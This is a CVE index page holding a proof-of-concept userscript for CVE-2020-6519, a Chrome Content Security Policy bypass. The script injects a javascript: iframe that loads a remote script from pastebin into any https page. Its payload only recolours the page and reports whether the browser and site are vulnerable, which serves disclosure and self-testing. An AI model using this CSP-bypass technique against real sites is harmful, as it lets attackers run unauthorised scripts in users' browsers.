4837 Total CVEs
26 Years
GitHub
Home / 2020 / CVE-2020-6519
README.md
Rendering markdown...
POC / CVE-2020-6519-TEST-IT-YOURSELF.js JS
⬇ Raw GitHub ✕ Close 
// ==UserScript==
// @name         EXPLOIT-CVE-2020-6519
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  try to take over the world!
// @author       Gal Weizman ([email protected])
// @match        https://*/*
// @grant        none
// ==/UserScript==

const cve_entire_func = function (fail = false) {
  top._CVE_START = true;

  function exploit () {
    message ('start running exploit');
    top._MESSAGE = message;
    top._CVE_URL = 'https://pastebin.com/raw/XpHsfXJQ';
    top._xxx = () => { top.CVE_STYLE.textContent += "div.sticky {background-color: yellow;}";         top._MESSAGE("script was successfully fetched from https://pastebin.com/raw/XpHsfXJQ even though Content Security Policy does not allow it! 😥👎🏻😭"); };
    top._yyy = () => { top.CVE_STYLE.textContent += "div.sticky {background-color: yellow;}";      top._MESSAGE("script failed to be fetched from https://pastebin.com/raw/XpHsfXJQ thanks to this Chrome being patched for CVE-2020-6519! 🥳👍🏻😁 (but this website's CSP is still not well configured though...)"); };
    var payload = `
			top.SUCCESS = true;
			var s = document.createElement("script");
			s.src = top._CVE_URL;
      s.onload  = top._xxx;
      s.onerror = top._yyy;
			document.body.appendChild(s);
        `;
    div2.innerHTML +=
      "<iframe id='_XXX' style='display:none' src='javascript:" +
      payload +
      "'></iframe>";
    setTimeout (() => {
      if (!top.SUCCESS) {
        _XXX.contentWindow.eval (payload);
      }
    });
    setTimeout (() => {
      message (
        'in case exploitation succeeded - an alert message originated by the forbidden script should pop up'
      );
      message ('finish testing exploitability');
    }, 500);
  }

  function css (color = 'greenyellow') {
    const content = `div.sticky {position: -webkit-sticky;position: sticky;top: 0;padding: 50px;background-color: ${color};font-size: 20px;}`;
    const style = document.createElement ('style');
    style.id = 'CVE_STYLE';
    style.textContent = content;
    document.head.appendChild (style);
  }

  function start () {
    message ('start testing exploitability');
    document.body.prepend (div);
    document.body.prepend (div2);
    css ();
    exploit ();
  }

  function message () {
    const args = [].slice.call (arguments);
    console.log.apply (null, ['CVE-2020-6519-exploit: '].concat (args));
    const p = document.createElement ('li');
    p.innerText = args.join (' ');
    div.appendChild (p);
  }

  function getIsVulnerable () {
    if (isVulnerable !== undefined) return isVulnerable;
    const ua = navigator.userAgent;
    message ('User Agent: ', ua);
    const uaParts = ua.split (' ');
    for (var i = 0; i < uaParts.length; i++) {
      if (0 !== uaParts[i].indexOf ('Chrome')) continue;
      const version = uaParts[i].replace ('Chrome/', '').split ('.')[0];
      isVulnerable = parseInt (version) < 84 && parseInt (version) > 72;
      message (
        'Chrome',
        isVulnerable ? 'is' : 'is not',
        'vulnerable to CVE-2020-6519',
        isVulnerable ? '😥' : '😁',
        '(version',
        version,
        'major)'
      );
      break;
    }
    return isVulnerable;
  }

  let div, div2, isVulnerable;

  function init () {
    div2 = document.createElement ('div');
    div2.id = 'b';
    div2.style.display = 'none';
    div = document.createElement ('div');
    div.id = 'a';
    div.setAttribute ('class', 'sticky');
    const b = document.createElement ('b');
    b.innerText = 'CVE-2020-6519-exploit: ';
    div.appendChild (b);
    //div.setAttribute('dir', 'rtl');

    isVulnerable = getIsVulnerable ();

    if (fail) {
      document.body.prepend (div);
      document.body.prepend (div2);
      css ();
      message (
        'script failed to load from https://pastebin.com/raw/XpHsfXJQ thanks to this website\'s Content Security Policy not allowing unsafe execution of scripts! 👏🏻🎉👏🏻🎉👏🏻'
      );
      return;
    }

    const s = document.createElement ('script');
    s.src = 'https://pastebin.com/raw/95f4NkAL';
    s.onload = () => {
      document.body.prepend (div);
      document.body.prepend (div2);
      css ('red');
      message (
        'this website is vulnerable due to poorley configured Content Security Policy'
      );
      message (
        'therefore, there is no reason to even check whether CVE-2020-6519 is exploitable or not - loading unwanted scripts can be done without it 🙄🙄🙄'
      );
    };
    s.onerror = () => {
      start ();
    };
    document.head.appendChild (s);
  }

  init ();
};

function check () {
  const s = document.createElement ('script');
  s.textContent = '(' + cve_entire_func + '())';
  top._CVE_START = false;
  setTimeout (() => {
    if (!_CVE_START) cve_entire_func (true);
  }, 1500);
  document.head.appendChild (s);
}

(function () {
  check ();
}) ();